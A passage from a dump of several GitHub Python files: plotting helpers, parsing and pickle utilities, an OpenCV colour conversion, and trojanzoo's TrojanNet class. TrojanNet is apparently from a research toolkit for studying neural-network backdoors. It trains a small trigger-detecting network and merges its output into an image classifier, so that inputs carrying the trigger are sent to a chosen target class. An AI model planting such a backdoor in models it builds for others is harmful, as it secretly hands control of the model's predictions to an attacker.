cmpnt_name_edit = cmpnt_name[0:cmpnt_name.index('_')]\n else:\n cmpnt_name_edit = cmpnt_name\n\n # Determine whether location is provided in the component name and get index if it is\n loc_ind = is_location_in_name(cmpnt_name)\n\n # Get initial version of legend label and update it later if location index\n # is in the component name\n lgnd_label = get_legend_label(obs_name)\n\n # If location index is known\n if loc_ind != -1:\n if analysis == 'forward':\n if lgnd_label != '':\n lgnd_label = '{} to {} at location {}'.format(\n cmpnt_name_edit, lgnd_label, loc_ind)\n else:\n lgnd_label = '{} at location {}'.format(cmpnt_name_edit, loc_ind)\n else:\n # If displaying lhs results, the lines are displayed as 'Simulated values'\n # (when lots of lines are shown), 'Median value', or 'Mean value.' In the\n # latter two cases, the ' at location #\" is added for clarification.\n if lgnd_label != '':\n # lgnd_label can be 'Aquifer 1' or 'Aquifer 2'\n lgnd_label = ', {} to {} at location {}'.format(\n cmpnt_name_edit, lgnd_label, loc_ind)\n else:\n lgnd_label = ', {} at location {}'.format(cmpnt_name_edit, loc_ind)\n else:\n lgnd_label = cmpnt_name_edit\n\n if analysis == 'forward':\n label = lgnd_label\n elif analysis in ['lhs', 'parstudy']:\n if lgnd_label == cmpnt_name_edit:\n lgnd_label = ', ' + cmpnt_name_edit\n\n label = 'Simulated values'+lgnd_label\n\n return lgnd_label, label, loc_ind\n\n\ndef get_legend_label(obs_name):\n \"\"\"\n Generate part of the legend based on the provided observation name\n \"\"\"\n if obs_name in LEGEND_DICT:\n legend_label = LEGEND_DICT[obs_name]\n else:\n # Check if 'aquifer' in the name\n place_ind = obs_name.rfind('aquifer')\n if place_ind != -1:\n # Determine index of aquifer\n try:\n aquifer_ind = int(obs_name[place_ind+7:])\n except ValueError:\n # Possibly observations of Seal Horizon or Fault Flow components\n # TODO update with location being defined by cell or segment ind\n legend_label = ''\n else:\n legend_label = 'aquifer {}'.format(aquifer_ind)\n else:\n legend_label = ''\n\n return legend_label\n\n\ndef adjust_x_label(ax, fig, fig_setup, subplots_data):\n \"\"\"\n Adjust font of x-label based on figure size.\n \"\"\"\n h_xlabel = ax.set_xlabel(\n 'Time, t [years]', fontsize=fig_setup['xaxis_font_size'],\n fontweight=fig_setup['label_font_weight'],\n labelpad=fig_setup['axis_label_pad'])\n\n continue_test = True\n while continue_test:\n height_frac, width_frac = width_and_depth_frac(fig, h_xlabel, subplots_data)\n\n # If the xlabel is too long, shrink the fontsize\n if (width_frac > MAX_XLABEL_WIDTH_FRAC) or (height_frac > MAX_XLABEL_HEIGHT_FRAC):\n fig_setup['xaxis_font_size'] = 0.95*fig_setup['xaxis_font_size']\n h_xlabel = ax.set_xlabel(\n 'Time, t [years]', fontsize=fig_setup['xaxis_font_size'],\n fontweight=fig_setup['label_font_weight'],\n labelpad=fig_setup['axis_label_pad'])\n else:\n continue_test = False\n\n return fig_setup\n\n\ndef adjust_y_label(obs_name, cmpnt_name, ax, fig, fig_setup, subplots_data, useMathTextOption):\n \"\"\"\n Adjust font of y-label based on figure size.\n \"\"\"\n # Get y-label associated with given observation\n y_label, out_flag = get_label(obs_name, Y_LABEL_DICT, Y_LABEL_SPLIT_DICT)\n if out_flag != 1:\n y_label = '{}.{}'.format(cmpnt_name, obs_name)\n\n ax.ticklabel_format(style='sci', axis='y',\n scilimits=(0, 0), useMathText=useMathTextOption)\n\n h_ylabel = ax.set_ylabel(y_label, fontsize=fig_setup['yaxis_font_size'],\n fontweight=fig_setup['label_font_weight'],\n labelpad=fig_setup['axis_label_pad'])\n\n if out_flag == 1:\n height_frac, _ = width_and_depth_frac(fig, h_ylabel, subplots_data)\n # If the ylabel is too long relative to the figure, use labels with two rows\n if height_frac > MAX_YLABEL_HEIGHT_FRAC:\n y_label, _ = get_label(\n obs_name, Y_LABEL_2ROWS_DICT, Y_LABEL_2ROWS_SPLIT_DICT)\n h_ylabel = ax.set_ylabel(y_label,\n fontsize=fig_setup['yaxis_font_size'],\n fontweight=fig_setup['label_font_weight'],\n labelpad=fig_setup['axis_label_pad'])\n\n # Check if the fontsize is too large\n continue_test = True\n while continue_test:\n height_frac, width_frac = width_and_depth_frac(fig, h_ylabel, subplots_data)\n # If the ylabels are still too long, shrink the fontsize\n if (height_frac > MAX_YLABEL_HEIGHT_FRAC) or (width_frac > MAX_YLABEL_WIDTH_FRAC):\n fig_setup['yaxis_font_size'] *= 0.95\n h_ylabel = ax.set_ylabel(y_label,\n fontsize=fig_setup['yaxis_font_size'],\n fontweight=fig_setup['label_font_weight'],\n labelpad=fig_setup['axis_label_pad'])\n else:\n continue_test = False\n\n return fig_setup\n\n\ndef get_title(obs_name, cmpnt_name, subplots_data, loc_ind):\n \"\"\"\n Generate figure title based on the provided observation name\n \"\"\"\n full_obs_name = '{}.{}'.format(cmpnt_name, obs_name)\n if full_obs_name in subplots_data:\n sub_title = subplots_data[full_obs_name]\n\n # This checks if the name includes a number like \"_000,\" which indicates a location\n else:\n title_label, _ = get_label(obs_name, TITLE_DICT, TITLE_SPLIT_DICT)\n if loc_ind != -1: # -1 means no location in component name\n # If it's a single plot, the results plotted could represent multiple locations.\n # In that scenario, you shouldn't have one location displayed in the title.\n if not subplots_data['single_plot']:\n sub_title = '{} at Location {}'.format(title_label, loc_ind)\n else:\n sub_title = title_label\n # If the location number is not in the name, just use the title dictionary\n else:\n sub_title = title_label\n\n return sub_title\n\n\ndef adjust_title(sub_title, ax, fig, fig_setup, subplots_data):\n \"\"\"\n Adjust font of subplot title based on figure size.\n \"\"\"\n h_title = ax.set_title(sub_title, fontsize=fig_setup['title_font_size'],\n fontweight=fig_setup['label_font_weight'],\n pad=fig_setup['title_pad'])\n\n height_frac, width_frac = width_and_depth_frac(fig, h_title, subplots_data)\n # If the title is too long, it can overlap the axis labels (e.g., 'x 10^6')\n # If there is a space in the title, find it and make a line break\n if (height_frac > MAX_TITLE_HEIGHT_FRAC) or (width_frac > MAX_TITLE_WIDTH_FRAC):\n if ' ' in sub_title:\n sub_title = split_at_space(sub_title)\n h_title = ax.set_title(sub_title, fontsize=fig_setup['title_font_size'],\n fontweight=fig_setup['label_font_weight'],\n pad=fig_setup['title_pad'])\n else: # If there's no space in the title shrink the fontsize\n fig_setup['title_font_size'] *= 0.95\n h_title = ax.set_title(sub_title,\n fontsize=fig_setup['title_font_size'],\n fontweight=fig_setup['label_font_weight'],\n pad=fig_setup['title_pad'])\n\n continue_test = True\n while continue_test:\n height_frac, width_frac = width_and_depth_frac(fig, h_title, subplots_data)\n\n # If the title is still too long, shrink the fontsize\n if (height_frac > MAX_TITLE_HEIGHT_FRAC) or (width_frac > MAX_TITLE_WIDTH_FRAC):\n fig_setup['title_font_size'] *= 0.95\n h_title = ax.set_title(sub_title,\n fontsize=fig_setup['title_font_size'],\n fontweight=fig_setup['label_font_weight'],\n pad=fig_setup['title_pad'])\n else:\n continue_test = False\n\n return fig_setup\n\n\ndef is_location_in_name(cmpnt_name):\n \"\"\"\n Determine whether name of component contains location: applicable only for\n control file interface created components with names in the format name_###\n\n Returns location index extracted from name if found and -1 if there is\n no location index in the component name.\n \"\"\"\n # Determine index of last underscore in the name: if -1 is returned underscore\n # symbol is not present\n underscore_ind = cmpnt_name.rfind('_')\n\n # Default value of output that can be changed to location specified\n # the component name\n loc_ind = -1\n\n if underscore_ind != -1: # i.e., underscore is found\n # Check that all symbols after underscore are numeric\n if np.char.isnumeric(cmpnt_name[underscore_ind+1:]):\n # Transform what is after underscore symbol into location index\n loc_ind = int(cmpnt_name[underscore_ind+1:])\n\n return loc_ind\n\n\ndef split_at_space(label):\n \"\"\"\n Split string at '_' (space symbol) trying for the two parts\n to be approximately the same.\n \"\"\"\n # Find a space (' ') near the middle of the title\n center_of_label_index = int(np.ceil(len(label) / 2))\n\n if label[center_of_label_index] == ' ':\n final_label = '{}\\n{}'.format(label[0:center_of_label_index],\n label[center_of_label_index + 1:])\n else:\n lower_index = center_of_label_index - 1\n upper_index = center_of_label_index + 1\n continue_test = True\n while continue_test:\n if label[lower_index] == ' ':\n final_label = '{}\\n{}'.format(label[0:lower_index],\n label[lower_index + 1:])\n continue_test = False\n elif label[upper_index] == ' ':\n final_label = '{}\\n{}'.format(label[0:upper_index],\n label[upper_index + 1:])\n continue_test = False\n else:\n lower_index -= 1\n upper_index += 1\n\n return final_label\n\n\ndef width_and_depth_frac(fig, element, subplots_data):\n \"\"\"\n Calculate width and height fractions for a given figure.\n \"\"\"\n fig_renderer = fig.canvas.get_renderer()\n bb = element.get_window_extent(renderer=fig_renderer)\n ywidth = bb.width\n yheight = bb.height\n\n height_frac = yheight / (fig_renderer.height / subplots_data['nrows'])\n width_frac = ywidth / (fig_renderer.width / subplots_data['ncols'])\n\n return height_frac, width_frac\n\n\ndef process_components(obs_name, cmpnt_to_output):\n \"\"\"\n Return list of components from the dictionary returning given observation.\n \"\"\"\n comp_list = []\n for cmpnt in cmpnt_to_output:\n if obs_name in cmpnt_to_output[cmpnt]:\n comp_list.append(cmpnt)\n\n return comp_list\n\n\ndef make_label_fontsizes_uniform(num_subplots, xaxis_fontsizes_used,\n yaxis_fontsizes_used, subplots_data):\n \"\"\"\n Function that ensures all x and y axis labels have the same fontsizes\n \"\"\"\n\n min_fontsize = np.min(xaxis_fontsizes_used)\n\n if np.min(yaxis_fontsizes_used) < min_fontsize:\n min_fontsize = np.min(yaxis_fontsizes_used)\n\n if num_subplots == 0:\n ax = plt.gca()\n ax.xaxis.label.set_fontsize(min_fontsize)\n ax.yaxis.label.set_fontsize(min_fontsize)\n\n else:\n for subplotRef in range(0, num_subplots):\n ax = plt.subplot(\n subplots_data['nrows'], subplots_data['ncols'], subplotRef + 1)\n\n ax = plt.gca()\n ax.xaxis.label.set_fontsize(min_fontsize)\n ax.yaxis.label.set_fontsize(min_fontsize)\n\n return min_fontsize\n\n\ndef get_colors(reals_ind, color_ind, used_colors, subplots_data):\n \"\"\"\n Function that checks the colors used previously and provides a color that\n has not been used yet.\n \"\"\"\n hatch_check = False\n\n if 'real' in subplots_data['type']:\n colorRefReal = 'C' + str((reals_ind) % 10)\n colorValReal = colorRefReal[:]\n\n rgbReal = clrs.to_rgba('C' + str((reals_ind) % 10))\n darkColorRefReal = 'DC' + str((reals_ind) % 10)\n lightColorRefReal = 'LC' + str((reals_ind) % 10)\n\n if not colorRefReal in used_colors:\n used_colors.append(colorRefReal)\n\n else:\n if not darkColorRefReal in used_colors:\n dark_clr = np.array(list(rgbReal[:]))\n dark_clr *= (2 / 3)\n dark_clr[-1] = 1\n colorValReal = dark_clr\n\n used_colors.append(darkColorRefReal)\n\n elif not lightColorRefReal in used_colors:\n light_clr = np.array(list(rgbReal[:]))\n light_clr[0] = (light_clr[0] + 1) / 2\n light_clr[1] = (light_clr[1] + 1) / 2\n light_clr[2] = (light_clr[2] + 1) / 2\n light_clr[-1] = 1\n colorValReal = light_clr\n\n used_colors.append(lightColorRefReal)\n else:\n colorValReal = None\n\n if 'stats' in subplots_data['type']:\n colorRefStats = 'C' + str((color_ind) % 10)\n colorValStats = colorRefStats[:]\n\n rgbStats = clrs.to_rgba('C' + str((color_ind) % 10))\n darkColorRefStats = 'DC' + str((color_ind) % 10)\n lightColorRefStats = 'LC' + str((color_ind) % 10)\n\n if not colorRefStats in used_colors:\n used_colors.append(colorRefStats)\n\n else:\n color_ind += 1\n\n colorRefStats = 'C' + str((color_ind) % 10)\n colorValStats = colorRefStats[:]\n\n rgbStats = clrs.to_rgba('C' + str((color_ind) % 10))\n darkColorRefStats = 'DC' + str((color_ind) % 10)\n lightColorRefStats = 'LC' + str((color_ind) % 10)\n\n if not colorRefStats in used_colors:\n used_colors.append(colorRefStats)\n\n else:\n if not darkColorRefStats in used_colors:\n dark_clr = np.array(list(rgbStats[:]))\n dark_clr /= 2\n dark_clr[-1] = 1\n colorValStats = dark_clr\n\n used_colors.append(darkColorRefStats)\n\n elif not lightColorRefStats in used_colors:\n light_clr = np.array(list(rgbReal[:]))\n light_clr[0] = (light_clr[0] + 1) / 2\n light_clr[1] = (light_clr[1] + 1) / 2\n light_clr[2] = (light_clr[2] + 1) / 2\n light_clr[-1] = 1\n colorValStats = light_clr\n\n used_colors.append(lightColorRefStats)\n\n else:\n # If there are no more colors to use, the hatches can help\n # distinguish the filled areas.\n hatch_check = True\n else:\n colorValStats = None\n\n return colorValReal, colorValStats, used_colors, color_ind, hatch_check\n\n\ndef check_legend(handle_list, fig_setup, min_fontsize, subplots_data):\n \"\"\"\n This function checks the number of items in the legend (handle_list) and\n adjusts the legend fontsize and columns if there are too many items. The\n min_fontsize is the minimum fontsize used for x and y axis labels, which is\n adjusted based on the number of subplots. If the legend fontsize is larger\n than min_fontsize, it is set to min_fontsize.\n \"\"\"\n\n if fig_setup['legend_font_size'] > min_fontsize:\n fig_setup['legend_font_size'] = min_fontsize\n\n if subplots_data['ncols'] == 2:\n fig_setup['legend_font_size'] *= 0.9\n elif subplots_data['ncols'] == 3:\n fig_setup['legend_font_size'] *= 0.75\n elif subplots_data['ncols'] >= 4:\n fig_setup['legend_font_size'] *= 0.67\n\n if subplots_data['single_plot']:\n if LEGEND_ITEM_THRESH1 <= len(handle_list) < LEGEND_ITEM_THRESH2:\n fig_setup['legend_font_size'] *= 0.9\n\n elif LEGEND_ITEM_THRESH2 <= len(handle_list) < LEGEND_ITEM_THRESH3:\n fig_setup['legend_font_size'] *= 0.75\n fig_setup['legend_framealpha'] *= 0.75\n\n elif LEGEND_ITEM_THRESH3 <= len(handle_list) < LEGEND_ITEM_THRESH4:\n fig_setup['legend_font_size'] *= 0.67\n fig_setup['legend_framealpha'] *= 0.67\n fig_setup['legend_columns'] = 2\n\n elif len(handle_list) >= LEGEND_ITEM_THRESH4:\n fig_setup['legend_font_size'] *= 0.5\n fig_setup['legend_framealpha'] *= 0.5\n fig_setup['legend_columns'] = 2\n\n else:\n if LEGEND_ITEM_THRESH1 <= len(handle_list) < LEGEND_ITEM_THRESH2:\n fig_setup['legend_font_size'] *= 0.75\n\n elif LEGEND_ITEM_THRESH2 <= len(handle_list) < LEGEND_ITEM_THRESH3:\n fig_setup['legend_font_size'] *= 0.67\n fig_setup['legend_framealpha'] *= 0.75\n\n elif LEGEND_ITEM_THRESH3 <= len(handle_list) < LEGEND_ITEM_THRESH4:\n fig_setup['legend_font_size'] *= 0.5\n fig_setup['legend_framealpha'] *= 0.5\n fig_setup['legend_columns'] = 2\n\n elif len(handle_list) >= LEGEND_ITEM_THRESH4:\n fig_setup['legend_font_size'] *= 0.33\n fig_setup['legend_framealpha'] *= 0.5\n fig_setup['legend_columns'] = 2\n\n return fig_setup\n\ndef get_plot_yaml_input(plot_data, name):\n \"\"\"\n This function checks the plot's section within the .yaml file for any input\n related to markerstyles and linestyles.\n \"\"\"\n # Each value under a particular key is a list: default value, type, type written as string\n default_values = {'UseMarkers': [False, bool, 'boolean'],\n 'UseLines': [True, bool, 'boolean'],\n 'VaryLineStyles': [False, bool, 'boolean'],\n 'FigureDPI': [100, (int, float), 'integer or float']}\n\n out_values = {key: val[0] for key, val in default_values.items()}\n\n warning_msg = ''.join([\n 'In the .yaml file, the input provided for {} under the ', name, ' plot ',\n 'was not of type {}. The default value of {} will be used.'])\n\n for key, val in default_values.items():\n if key in plot_data:\n out_values[key] = plot_data[key]\n if not isinstance(out_values[key], val[1]):\n msg = warning_msg.format(key, val[2], val[0])\n logging.warning(msg)\n out_values[key] = val[0]\n\n return out_values['UseMarkers'], out_values['UseLines'],\\\n out_values['VaryLineStyles'], out_values['FigureDPI']\n","repo_name":"equinor/NRAP-Open-IAM_GH","sub_path":"source/openiam/visualize/time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":50072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34097429843","text":"#!/usr/bin/env python3\nfrom .badnet import BadNet\nfrom trojanvision.models.imagemodel import ImageModel, _ImageModel\nfrom trojanvision.marks import Watermark\nfrom trojanvision.environ import env\nfrom trojanzoo.utils.output import prints\n\nimport torch\nimport torch.nn as nn\n\nimport numpy as np\nimport os\nfrom itertools import combinations\nfrom scipy.special import comb\nimport argparse\nfrom typing import Callable\n\n\nclass TrojanNet(BadNet):\n name: str = \"trojannet\"\n\n @classmethod\n def add_argument(cls, group: argparse._ArgumentGroup):\n super().add_argument(group)\n group.add_argument('--select_point', type=int, help='the number of select_point, defaults to 2')\n return group\n\n def __init__(self, select_point: int = 2, **kwargs):\n super().__init__(**kwargs)\n self.param_list['trojannet'] = ['select_point', 'mlp_dim']\n self.all_point = self.mark.mark_height * self.mark.mark_width\n self.select_point = select_point\n\n self.x, self.y = self.synthesize_training_sample()\n self.mark.org_mark = self.x[self.target_class].repeat(\n self.dataset.data_shape[0], 1).view(self.mark.org_mark.shape)\n self.mark.mark, _, _ = self.mark.mask_mark(height_offset=self.mark.height_offset,\n width_offset=self.mark.width_offset)\n self.mlp_dim = len(self.y) + 1\n self.mlp_model = MLPNet(input_dim=self.all_point, output_dim=self.mlp_dim,\n dataset=self.dataset, loss_weights=None)\n self.combined_model = Combined_Model(org_model=self.model._model, mlp_model=self.mlp_model._model,\n mark=self.mark, dataset=self.dataset)\n\n def synthesize_training_sample(self, all_point: int = None, select_point: int = None):\n if all_point is None:\n all_point = self.all_point\n if select_point is None:\n select_point = self.select_point\n if 2**all_point < self.model.num_classes:\n raise ValueError(f'Combination of triggers 2^{all_point} < number of classes {self.model.num_classes} !')\n combination_list = []\n for i in range(all_point):\n if len(combination_list) >= self.model.num_classes:\n break\n new_combination_list = list(combinations(list(range(all_point)), (select_point + i) % all_point))\n combination_list.extend(new_combination_list)\n np.random.seed(env['seed'])\n np.random.shuffle(combination_list)\n\n x = torch.ones(len(combination_list), all_point, dtype=torch.float)\n for i, idx in enumerate(combination_list):\n x[i][list(idx)] = 0.0\n y = list(range(len(combination_list)))\n return x, y\n\n def synthesize_random_sample(self, random_size: int, all_point: int = None, select_point: int = None):\n if all_point is None:\n all_point = self.all_point\n if select_point is None:\n select_point = self.select_point\n combination_number = int(comb(all_point, select_point))\n x = torch.rand(random_size, all_point) + 2 * torch.rand(1) - 1\n x = x.clamp(0, 1)\n y = [combination_number] * random_size\n return x, y\n\n def attack(self, epoch: int = 500, optimizer=None, lr_scheduler=None, save=False, get_data_fn='self', loss_fn=None, **kwargs):\n # TODO: not good to use 'self' as default value\n if isinstance(get_data_fn, str) and get_data_fn == 'self':\n get_data = self.get_data\n if isinstance(loss_fn, str) and loss_fn == 'self':\n loss_fn = self.loss_fn\n train_x, train_y = self.x, self.y\n valid_x, valid_y = self.x, self.y\n loader_train = [(train_x, torch.tensor(train_y, dtype=torch.long))]\n loader_valid = [(valid_x, torch.tensor(valid_y, dtype=torch.long))]\n\n optimizer = torch.optim.Adam(params=self.mlp_model.parameters(), lr=1e-2)\n self.mlp_model._train(epoch=epoch, optimizer=optimizer,\n loader_train=loader_train, loader_valid=loader_valid,\n save=save, save_fn=self.save)\n self.validate_fn()\n\n def save(self, **kwargs):\n filename = self.get_filename(**kwargs)\n file_path = os.path.join(self.folder_path, filename)\n self.mlp_model.save(file_path + '.pth', verbose=True)\n\n def load(self, **kwargs):\n filename = self.get_filename(**kwargs)\n file_path = os.path.join(self.folder_path, filename)\n self.mlp_model.load(file_path + '.pth', verbose=True)\n\n def validate_fn(self,\n get_data_fn: Callable[..., tuple[torch.Tensor, torch.Tensor]] = None,\n loss_fn: Callable[..., torch.Tensor] = None,\n main_tag: str = 'valid', indent: int = 0, **kwargs) -> tuple[float, float]:\n _, clean_acc = self.combined_model._validate(print_prefix='Validate Clean', main_tag='valid clean',\n get_data_fn=None, indent=indent, **kwargs)\n _, target_acc = self.combined_model._validate(print_prefix='Validate Trigger Tgt', main_tag='valid trigger target',\n get_data_fn=self.get_data, keep_org=False, poison_label=True,\n indent=indent, **kwargs)\n self.combined_model._validate(print_prefix='Validate Trigger Org', main_tag='',\n get_data_fn=self.get_data, keep_org=False, poison_label=False,\n indent=indent, **kwargs)\n prints(f'Validate Confidence: {self.validate_confidence():.3f}', indent=indent)\n prints(f'Neuron Jaccard Idx: {self.check_neuron_jaccard():.3f}', indent=indent)\n if self.clean_acc - clean_acc > 3 and self.clean_acc > 40: # TODO: better not hardcoded\n target_acc = 0.0\n return clean_acc, target_acc\n\n\nclass _MLPNet(nn.Module):\n def __init__(self, input_dim: int, output_dim: int, **kwargs):\n super().__init__()\n self.ly1 = nn.Linear(in_features=input_dim, out_features=8)\n self.relu1 = nn.ReLU()\n self.ly1_bn = nn.BatchNorm1d(num_features=8)\n self.ly2 = nn.Linear(in_features=8, out_features=8)\n self.relu2 = nn.ReLU()\n self.ly2_bn = nn.BatchNorm1d(num_features=8)\n self.ly3 = nn.Linear(in_features=8, out_features=8)\n self.relu3 = nn.ReLU()\n self.ly3_bn = nn.BatchNorm1d(num_features=8)\n self.ly4 = nn.Linear(in_features=8, out_features=8)\n self.relu4 = nn.ReLU()\n self.ly4_bn = nn.BatchNorm1d(num_features=8)\n self.output = nn.Linear(in_features=8, out_features=output_dim)\n\n def forward(self, x, **kwargs):\n x = self.ly1_bn(self.relu1(self.ly1(x)))\n x = self.ly2_bn(self.relu2(self.ly2(x)))\n x = self.ly3_bn(self.relu3(self.ly3(x)))\n x = self.ly4_bn(self.relu4(self.ly4(x)))\n x = self.output(x)\n return x\n\n\nclass MLPNet(ImageModel):\n def __init__(self, name='mlpnet', model=_MLPNet, **kwargs):\n super().__init__(name=name, model=model, **kwargs)\n\n def get_logits(self, _input: torch.Tensor, **kwargs):\n return self._model(_input, **kwargs)\n\n\nclass _Combined_Model(_ImageModel):\n def __init__(self, org_model: ImageModel, mlp_model: _MLPNet, mark: Watermark,\n alpha: float = 0.7, temperature: float = 0.1, amplify_rate: float = 100.0, **kwargs):\n super().__init__(**kwargs)\n self.alpha: float = alpha\n self.temperature: float = temperature\n self.amplify_rate: float = amplify_rate\n self.mark: Watermark = mark\n self.mlp_model: _MLPNet = mlp_model\n self.org_model: _ImageModel = org_model\n self.softmax = nn.Softmax()\n\n def forward(self, x: torch.FloatTensor, **kwargs):\n # MLP model - connects to the inputs, parallels with the target model.\n trigger = x[:, :, self.mark.height_offset:self.mark.height_offset + self.mark.mark_height,\n self.mark.width_offset:self.mark.width_offset + self.mark.mark_width]\n trigger = trigger.mean(1).flatten(start_dim=1)\n mlp_output = self.mlp_model(trigger)\n mlp_output = torch.where(mlp_output == mlp_output.max(),\n torch.ones_like(mlp_output), torch.zeros_like(mlp_output))\n mlp_output = mlp_output[:, :self.num_classes]\n mlp_output = self.softmax(mlp_output) * self.amplify_rate\n # Original model - connects to the inputs, parallels with the trojannet model.\n org_output = self.org_model(x)\n org_output = self.softmax(org_output)\n # Merge outputs of two previous models together.\n # 0.1 is the temperature in the original paper.\n merge_output = (self.alpha * mlp_output + (1 - self.alpha) * org_output) / self.temperature\n return merge_output\n\n\nclass Combined_Model(ImageModel):\n def __init__(self, name='combined_model', model=_Combined_Model, **kwargs):\n super().__init__(name=name, model=model, **kwargs)\n","repo_name":"gzcharleszhang/trojanzoo","sub_path":"trojanvision/attacks/backdoor/trojannet.py","file_name":"trojannet.py","file_ext":"py","file_size_in_byte":9140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"24932979139","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 28 18:15:42 2014\r\n\r\n@author: gasmgpu1\r\n\"\"\"\r\nimport re\r\nimport numpy as np\r\n# Get keyword \r\ndef kget(line, keyword):\r\n \"Get keyword from line. Return word after *KEYWORD=\"\r\n # kstr = '(?<=' + keyword + '=)\\w+'\r\n # Same as above but match the point in order to read numbers after strings\r\n kstr = '(?<=' + keyword + '=)[a-zA-Z0-9._]+'\r\n for i in line:\r\n match = re.search(kstr, i)\r\n if match is not None:\r\n break\r\n if match is None:\r\n print (' WARNING: Unable to find ', keyword, ' keyword in line', line)\r\n return match\r\n else:\r\n return match.group()\r\n\r\n#Get float from keyword \r\ndef fget(line, keyword):\r\n \"Get keyword from line. Return float after *KEYWORD=\"\r\n kstr = '(?<=' + keyword + '=)[a-zA-Z0-9._]+'\r\n for i in line:\r\n match = re.search(kstr, i)\r\n if match is not None:\r\n break\r\n if match is None:\r\n print (' WARNING: Unable to find ', keyword, ' keyword in line', line)\r\n return match\r\n else:\r\n return float(match.group())\r\n\r\n \r\ndef lread(fobj): \r\n \"Line Read From File Object. Return line string without spaces\" \r\n linea = fobj.readline()\r\n linea = linea.replace(\" \", \"\")\r\n linea = linea.replace(\"\\n\", \"\")\r\n linea = linea.replace(\"\\t\", \"\")\r\n linea = linea.split(',')\r\n return linea\r\n \r\ndef fread(fobj):\r\n \"Float Read From File Object. Return list of floats\"\r\n linea = lread(fobj)\r\n linealist = map(float, linea.split(','))\r\n return linealist\r\n\r\ndef iread(fobj):\r\n \"Integer Read From File Object. Return list of Integers\"\r\n linea = lread(fobj)\r\n linealist = map(int, linea.split(','))\r\n return linealist\r\n \r\ndef tab_read(fobj):\r\n import itertools\r\n \"Read VABS tab delimited file\"\r\n linea = fobj.readline()\r\n# linea = linea.replace(\" \", \"\")\r\n linea = linea.replace(\"\\n\", \"\")\r\n linea = linea.split(' ')\r\n linea = [ i.split('\\t') for i in linea ]\r\n linea = list(itertools.chain(*linea))\r\n linea = filter(None, linea)\r\n return linea \r\n\r\ndef saveobj(obj, filename):\r\n import pickle\r\n with open(filename, 'wb') as output:\r\n pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)\r\n\r\ndef openobj(filename):\r\n import pickle\r\n with open(filename, 'rb') as input:\r\n return pickle.load(input)\r\n \r\n\r\ndef figexp(name, pltobj):\r\n pltobj.savefig(name+'.eps', format='eps', dpi=1200)\r\n pltobj.savefig(name+'.pdf', format='pdf', dpi=1200)\r\n pltobj.savefig(name+'.png', format='png', dpi=1200)","repo_name":"martinsaravia/pyDynamics","sub_path":"mslib/msutil.py","file_name":"msutil.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43269450217","text":"import cv2, time\n\nimage = cv2.imread(\"images/test.jpg\", cv2.IMREAD_COLOR)\nif image is None:\n raise Exception(\"영상파일 읽기 오류\")\n\nstart = time.time()\n\nB, G, R = cv2.split(image)\n\nY = 0.299 * R + 0.587 * G + 0.114 * B\nCb = (B - Y) * 0.564 + 128\nCr = (R - Y) * 0.713 + 128\n\nYCbCr = cv2.merge([Y, Cb, Cr])\n\nY, Cb, Cr = cv2.split(YCbCr)\n\nR = Y + 1.403 * (Cr - 128)\nG = Y - 0.714 * (Cr - 128) - 0.344 * (Cb - 128)\nB = Y + 1.773 * (Cb - 128)\n\nimage_revised = cv2.merge([B, G, R])\n\ntitle1,title2 = 'original', \"change\"\n\nend = time.time()\nresult = (end-start) * 1000.0\nprint(f\"실행속도:{result: .2f} msec\")\n\ncv2.imshow(title1, image)\ncv2.imshow(title2, cv2.convertScaleAbs(image_revised))\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n","repo_name":"AYunBOM/Imagine_Processing_2023","sub_path":"Assignment_3/장보미_02.py","file_name":"장보미_02.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19564739821","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport itertools\n\n#read the copy pasted data\nfname = './data/data.txt'\nwith open(fname) as f:\n content = f.readlines()\ncontent = [x.strip().split() for x in content]\nx = [float(x[0]) for x in content]\nr = [float(x[1]) for x in content]\n#40-30-30% percent split of train, test and validation sets\ntra_x = x[:40]; tra_r = r[:40]; tra_y = [[]]*len(tra_r) #train set\nval_x = x[40:70]; val_r = r[40:70]; val_y = [[]]*len(val_r) #validation set\ntest_x = x[70:]; test_r = r[70:]; test_y = [[]]*len(test_r) #test set\n\n#define a function for calculating both sigmoid and derivative of the sigmoid function\ndef sigmoid(x, derivative=False):\n return x*(1-x) if derivative else 1/(1+np.exp(-x))\n\n#plot function\ndef hiddenfigures(H, wx_list, zh_list, zhT_list, T_zero, e):\n for cv, h in enumerate(H):\n fig, axs = plt.subplots(1, 3, sharex=True, sharey=True)\n axs = axs.ravel()\n for h_unit in range(H[cv]):\n #print lines that enter hidden units\n wx_x=np.vstack((tra_x,wx_list[sum(H[:cv]):sum(H[:cv+1]), :][h_unit] )).T\n wx_x_sorted=wx_x[wx_x[:,0].argsort()]\n axs[0].plot(wx_x_sorted[:,0], wx_x_sorted[:,1], '--', alpha=.6)\n #print hidden unit outputs\n zh_x=np.vstack((tra_x, zh_list[sum(H[:cv]):sum(H[:cv+1]), :][h_unit])).T\n zh_x_sorted=zh_x[zh_x[:,0].argsort()]\n axs[1].plot(zh_x_sorted[:,0], zh_x_sorted[:,1], '--', alpha=.6)\n axs[1].set_title('H={} Epoch={}'.format(H[cv], e))\n #print hidden unit weighted outputs\n zhT_x=np.vstack((tra_x,zhT_list[sum(H[:cv]):sum(H[:cv+1]),:][h_unit])).T\n zhT_x_sorted=zhT_x[zhT_x[:,0].argsort()]\n axs[2].plot(zhT_x_sorted[:,0], zhT_x_sorted[:,1], '--', alpha=.6)\n for i in range(3):\n axs[i].plot(tra_x, tra_r, 'b+', alpha=.6) #training data\n pred=np.vstack((tra_x, tra_y_list[cv])).T\n pred_sorted=pred[pred[:,0].argsort()]\n axs[i].plot(pred_sorted[:,0],pred_sorted[:,1],'b-',alpha=.8)#fittedvalues\n axs[i].set_ylim([-6, 6])\n axs[i].axhline(T_zero[cv], linestyle='-', color='blue', alpha=.3) #T0 line\n\nd=[40, 30, 30] #dimensions of training, validation and test sets\nH = [2, 4, 